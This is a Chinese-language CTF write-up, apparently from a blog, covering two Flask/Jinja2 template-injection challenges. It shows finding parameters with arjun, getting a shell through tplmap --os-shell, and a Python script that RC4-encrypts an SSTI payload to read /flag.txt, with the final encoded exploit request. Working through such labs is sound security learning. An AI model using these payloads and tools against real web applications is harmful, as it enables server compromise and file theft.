2021-10-06

flask模板注入以及arjun和tplmap工具运用以及rc4加密

flask模板注入之arjun和tplmap工具的使用

打开页面，发现页面有显示flask字段，再看题目名称，可以推测是flask注入，但是注入点在哪里呢，找不到，所以我们可以使用arjun工具爆出注入点

1	python3 arjun.py -u http://url/ --get -d 5 -t 1

-d 5的作用是请求间隔，如果服务器设置了防ddos，则一定要加-d 5，否则会429，无法爆破出来，最后爆破，结果

Analysing the content of the webpage
Analysing behaviour for a non-existent parameter
Reflections: 0
Response Code: 200
Content Length: 2292
Plain-text Length: 428
Parsing webpage for potential parameters
Performing heuristic level checks
Heuristic found 2 potential parameters.
Scan Completed
Valid parameter found: name
Reason: Different number of reflections

因此，我们可以知道注入点是name，所以我们构造payload

1	/?name={{7*7}}

发现回显

1	I ♥ Flask & 49

因此，注入点找到，我们可以使用内置类subprocess.Popen类来执行命令，但是这里有个tplmap的工具，可以让我们知道是什么类型的模板注入以及获得shell

我们可以输入命令

1	python2 tplmap.py -u http://url/?name=1

即可看到是jinja模板的注入，然后输入

1	python2 tplmap.py -u http://url/?name=1 --os-shell

即可获得shell，然后直接

1	cat flag.txt

即可获得flag

flask模板注入之rc4加密

打开页面后，发现是

1	Welcome To Find Secret

然后查看页面源码以及抓包，也发现不了有用信息，所以我们用dirsearch.py工具扫以下，发现

/secret

回显出

1	Tell me your secret.I will encrypt it so other can't see

通过这句话，推测要传参，且参数为secret，所以构造

1	/secret?secret=1

发现回显一个字母，所以尝试增长字符串

1	/secret?secret=11111111111111111111111

发现报错

UnicodeDecodeError

UnicodeDecodeError: 'ascii' codec can't decode byte 0xfb in position 4: ordinal not in range(128)
Traceback (most recent call last)

    File "/usr/local/lib/python2.7/site-packages/flask/app.py", line 2309, in __call__

    return self.wsgi_app(environ, start_response)

    File "/usr/local/lib/python2.7/site-packages/flask/app.py", line 2295, in wsgi_app

    response = self.handle_exception(e)

    File "/usr/local/lib/python2.7/site-packages/flask/app.py", line 1741, in handle_exception

    reraise(exc_type, exc_value, tb)

    File "/usr/local/lib/python2.7/site-packages/flask/app.py", line 2292, in wsgi_app

    response = self.full_dispatch_request()

    File "/usr/local/lib/python2.7/site-packages/flask/app.py", line 1815, in full_dispatch_request

    rv = self.handle_user_exception(e)

    File "/usr/local/lib/python2.7/site-packages/flask/app.py", line 1718, in handle_user_exception

    reraise(exc_type, exc_value, tb)

    File "/usr/local/lib/python2.7/site-packages/flask/app.py", line 1813, in full_dispatch_request

    rv = self.dispatch_request()

    File "/usr/local/lib/python2.7/site-packages/flask/app.py", line 1799, in dispatch_request

    return self.view_functions[rule.endpoint](**req.view_args)

    File "/app/app.py", line 35, in secret

    a=render_template_string(safe(deS))

    File "/usr/local/lib/python2.7/site-packages/flask/templating.py", line 149, in render_template_string

    return _render(ctx.app.jinja_env.from_string(source),

    File "/usr/local/lib/python2.7/site-packages/jinja2/environment.py", line 880, in from_string

    return cls.from_code(self, self.compile(source), globals, None)

    File "/usr/local/lib/python2.7/site-packages/jinja2/environment.py", line 579, in compile

    source = self._parse(source, name, filename)

    File "/usr/local/lib/python2.7/site-packages/jinja2/environment.py", line 497, in _parse

    return Parser(self, source, name, encode_filename(filename)).parse()

    File "/usr/local/lib/python2.7/site-packages/jinja2/parser.py", line 40, in __init__

    self.stream = environment._tokenize(source, name, filename, state)

    File "/usr/local/lib/python2.7/site-packages/jinja2/environment.py", line 528, in _tokenize

    source = self.preprocess(source, name, filename)

    File "/usr/local/lib/python2.7/site-packages/jinja2/environment.py", line 522, in preprocess

    self.iter_extensions(), text_type(source))

    UnicodeDecodeError: 'ascii' codec can't decode byte 0xfb in position 4: ordinal not in range(128)

我们从报错的信息中找到flask模板注入的函数

1	a=render_template_string(safe(deS))

所以点击去看源码

if(secret==None):

        return 'Tell me your secret.I will encrypt it so others can\'t see'

    rc=rc4_Modified.RC4("HereIsTreasure")   #解密

    deS=rc.do_crypt(secret)

 

    a=render_template_string(safe(deS))

 

    if 'ciscn' in a.lower():

        return 'flag detected!'

   return a

可知，会对get提交的参数secret的值进行rc4解密

1
2
3

rc=rc4_Modified.RC4("HereIsTreasure")   #解密

deS=rc.do_crypt(secret)

所以，我们需要对secret进行加密，然后解密后的secret会赋值给des，然后用render_template_string()函数进行模板渲染，所以我们可以使用内置类来执行命令，从而造成模板注入，但是内置类需要先rc4加密，所以exp

import base64
from urllib.parse import quote
def rc4_main(key = "init_key", message = "init_message"):
    # print("RC4加密主函数")
    s_box = rc4_init_sbox(key)
    crypt = str(rc4_excrypt(message, s_box))
    return  crypt
def rc4_init_sbox(key):
    s_box = list(range(256))  
    # print("原来的 s 盒：%s" % s_box)
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    # print("混乱后的 s 盒：%s"% s_box)
    return s_box
def rc4_excrypt(plain, box):
    # print("调用加密程序成功。")
    res = []
    i = j = 0
    for s in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(ord(s) ^ k))
    cipher = "".join(res)
    print("加密后的字符串是：%s" %quote(cipher))
    return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
rc4_main("HereIsTreasure","{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}")

即可得到

.%14%1E%12%C3%A484mg%C2%9C%C3%8B%00%C2%81%C2%8D%C2%B8%C2%97%0B%C2%9EF%3B%C2%88m%C2%AEM5%C2%96%3D%C2%9D%5B%C3%987%C3%AA%12%C2%B4%05%C2%84A%C2%BF%17%C3%9Bh%C3%8F%C2%8F%C3%A1a%0F%C2%AE%09%C2%A0%C2%AEyS%2A%C2%A2d%7C%C2%98/%00%C2%90%C3%A9%03Y%C2%B2%C3%9B%1F%C2%B6H%3D%0A%23%C3%B1%5B%C2%9Cp%C2%AEn%C2%96i%5Dv%7FX%C2%92

然后构造payload

/secret?secret=.%14%1E%12%C3%A484mg%C2%9C%C3%8B%00%C2%81%C2%8D%C2%B8%C2%97%0B%C2%9EF%3B%C2%88m%C2%AEM5%C2%96%3D%C2%9D%5B%C3%987%C3%AA%12%C2%B4%05%C2%84A%C2%BF%17%C3%9Bh%C3%8F%C2%8F%C3%A1a%0F%C2%AE%09%C2%A0%C2%AEyS%2A%C2%A2d%7C%C2%98/%00%C2%90%C3%A9%03Y%C2%B2%C3%9B%1F%C2%B6H%3D%0A%23%C3%B1%5B%C2%9Cp%C2%AEn%C2%96i%5Dv%7FX%C2%92

即可得到flag